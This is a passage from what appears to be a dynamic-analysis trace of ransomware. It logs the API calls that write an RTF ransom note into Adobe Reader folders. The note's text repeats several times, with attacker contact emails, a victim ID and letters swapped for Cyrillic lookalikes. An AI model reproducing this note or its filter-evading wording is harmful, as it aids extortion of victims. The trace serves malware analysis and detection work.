b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.901] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.903] CloseHandle (hObject=0x1e4) returned 1 [0064.903] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\bg85_info.rtf")) returned 0xffffffff [0064.903] GetLastError () returned 0x2 [0064.903] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 